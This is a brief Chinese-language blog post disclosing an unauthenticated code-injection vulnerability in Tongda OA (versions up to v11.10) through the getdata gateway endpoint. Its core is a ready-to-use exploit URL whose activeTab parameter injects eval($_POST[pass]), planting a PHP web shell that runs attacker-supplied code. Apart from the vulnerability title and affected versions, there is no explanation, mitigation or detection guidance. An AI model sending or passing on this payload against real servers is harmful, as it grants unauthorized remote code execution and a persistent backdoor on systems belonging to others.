通达OA v11.9 getdata 未授权任意文件上传

漏洞描述

通达OA ≤ v11.10

EXP

/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval($_POST[pass]))%3B/*&id=19&module=Carouselimage

最后修改：2023 年 10 月 31 日

如果觉得我的文章对你有用，请随意赞赏

评论 *

私密评论

名称 *

🎲

邮箱 *

地址 *